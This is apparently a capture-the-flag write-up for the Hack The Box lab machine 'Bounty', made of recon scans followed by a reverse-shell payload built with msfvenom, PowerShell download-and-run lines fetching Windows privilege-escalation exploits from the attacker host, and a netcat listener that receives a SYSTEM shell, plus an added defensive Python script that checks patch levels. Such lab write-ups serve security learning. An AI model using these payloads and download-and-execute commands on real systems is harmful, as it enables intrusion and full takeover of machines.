bounty

Introduction:

Recon

```
eneloop@kinetic:…/hackthebox/bounty/data$ sudo nmap -sS -sV -T4 -O -oN nmap.bounty.txt 10.10.10.93
[sudo] password for eneloop:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 19:46 EST
Nmap scan report for 10.10.10.93
Host is up (0.014s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|general purpose|specialized
Running (JUST GUESSING): Microsoft Windows Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
```

Enumeration

```
eneloop@kinetic:…/hackthebox/bounty/data$ nikto -url http://10.10.10.93/
- Nikto v2.1.6

+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2021-02-17 19:48:26 (GMT-5)

+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-02-17 19:51:25 (GMT-5) (179 seconds)

+ 1 host(s) tested
```

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.93/

Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)

[+] Url:            http://10.10.10.93/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s

2021/02/17 19:49:11 Starting gobuster

/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)

2021/02/17 19:55:19 Finished
```


```
^C
eneloop@kinetic:…/hackthebox/bounty/data$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.93/ -x aspx

Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)

[+] Url:            http://10.10.10.93/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx
[+] Timeout:        10s

2021/02/20 08:46:47 Starting gobuster

/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
Progress: 34335 / 220561 (15.57%)
```

Exploitation

```
(py3) eneloop@kinetic:…/hackthebox/bounty/data$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=4455 -f psh --platform windows -a x64 -o sh.ps1
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of psh file: 3269 bytes
Saved as: sh.ps1
(py3) eneloop@kinetic:…/hackthebox/bounty/data$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.93 - - [20/Feb/2021 22:00:50] "GET /sh.ps1 HTTP/1.1" 200 -
10.10.10.93 - - [20/Feb/2021 22:03:25] "GET /sh.ps1 HTTP/1.1" 200 -
```

Post-exploit/PrivEsc


```
PS C:\windows\system32\inetsrv> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          2/21/2021, 4:48:15 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,584 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,585 MB
Virtual Memory: In Use:    510 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93
PS C:\windows\system32\inetsrv> cd C:\users\merlin\appdata\local\temp
PS C:\users\merlin\appdata\local\temp> (new-object net.webclient).downloadfile('http://10.10.14.38:8000/MS11-011.exe', '\users\merlin\appdata\local\temp\MS11-011.exe')
PS C:\users\merlin\appdata\local\temp> .\MS11-011.exe
PS C:\users\merlin\appdata\local\temp> whoami
bounty\merlin
PS C:\users\merlin\appdata\local\temp> MS11-011.exe
bounty\merlin
PS C:\users\merlin\appdata\local\temp> Invoke-PowerShellTcp : The term 'MS11-011.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:128 char:21
+             Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.14.38 -Port 4455
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShellTcp

PS C:\users\merlin\appdata\local\temp> .\MS11-011.exe
PS C:\users\merlin\appdata\local\temp> whoami
bounty\merlin
PS C:\users\merlin\appdata\local\temp> \windows\microsoft.net\framework\v2.0.50727\msbuild -version
Microsoft (R) Build Engine Version 2.0.50727.4927
[Microsoft .NET Framework, Version 2.0.50727.4927]
Copyright (C) Microsoft Corporation 2005. All rights reserved.

2.0.50727.4927
PS C:\users\merlin\appdata\local\temp> (new-object net.webclient).downloadfile('http://10.10.14.38:8000/MS10-059.exe', '\users\merlin\appdata\local\temp\MS10-059.exe')
PS C:\users\merlin\appdata\local\temp>
PS C:\users\merlin\appdata\local\temp> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Usage: Chimichurri.exe ipaddress port
PS C:\users\merlin\appdata\local\temp> .\MS10-059.exe 10.10.14.38 4455
```
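The systeminfo output above is the defender's tell: "OS Version: 6.1.7600" with "Hotfix(s): N/A" means the server never received a service pack or a security update, which is why a local privilege escalation patched years earlier still works. The Python below is an added example, not part of the original writeup: it parses systeminfo-style output and returns findings; the two samples are constructed (UNPATCHED abbreviates the output above, PATCHED is made up) and the KB ids in them are placeholders.

```python
import re

# Constructed samples: UNPATCHED abbreviates the systeminfo output above,
# PATCHED is a made-up SP1 host whose KB id is a placeholder.
UNPATCHED = """\
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""
PATCHED = """\
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB0000001
"""
# NT 6.1 (Windows 7 / Server 2008 R2) shipped as build 7600; SP1 is 7601.
RTM_BUILDS = {"6.1": 7600}


def parse_systeminfo(text):
    """Return (fields, hotfixes): 'Field': value pairs and listed KB ids."""
    fields, hotfixes, in_hotfix = {}, [], False
    for line in text.splitlines():
        if line[:1].isspace():
            # Indented continuation line; only the Hotfix(s) block matters.
            m = re.search(r"\[\d+\]:\s*(KB\d+)", line)
            if in_hotfix and m:
                hotfixes.append(m.group(1))
            continue
        m = re.match(r"([^:]+):\s*(.*)", line)
        if m:
            key = m.group(1).strip()
            fields[key] = m.group(2).strip()
            in_hotfix = key == "Hotfix(s)"  # following indented lines are KBs
    return fields, hotfixes


def assess(text, required_kbs=()):
    """Return a list of findings; an empty list means nothing was flagged."""
    fields, hotfixes = parse_systeminfo(text)
    m = re.match(r"(\d+\.\d+)\.(\d+)", fields.get("OS Version", ""))
    if not m:
        return ["OS Version line missing: cannot assess"]
    nt, build = m.group(1), int(m.group(2))
    findings = []
    if RTM_BUILDS.get(nt) == build:
        findings.append(f"build {build} is RTM for NT {nt}: no service pack")
    if fields.get("Hotfix(s)", "N/A").startswith("N/A"):
        findings.append("no hotfixes installed")
    missing = [kb for kb in required_kbs if kb not in hotfixes]
    if missing:
        findings.append("missing required updates: " + ", ".join(missing))
    return findings
```

Pass the KB ids your patch baseline requires as `required_kbs`; on a real host the output is simply piped in from `systeminfo`.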

On Attack Machine -

```
(py3) eneloop@kinetic:…/hackthebox/bounty/data$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.93] 49164
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\merlin\appdata\local\temp>whoami
whoami
nt authority\system

C:\users\merlin\appdata\local\temp>cd ../../..
cd ../../..

C:\Users\merlin>cd ..
cd ..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users

05/30/2018  11:18 PM    <DIR>          .
05/30/2018  11:18 PM    <DIR>          ..
05/30/2018  11:18 PM    <DIR>          Administrator
05/30/2018  03:44 AM    <DIR>          Classic .NET AppPool
05/29/2018  11:22 PM    <DIR>          merlin
05/30/2018  04:44 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  11,883,778,048 bytes free

C:\Users>cd Administrator/Desktop
cd Administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\Administrator\Desktop

05/30/2018  11:18 PM    <DIR>          .
05/30/2018  11:18 PM    <DIR>          ..
05/30/2018  11:18 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  11,883,778,048 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa
C:\Users\Administrator\Desktop>
```

Notes: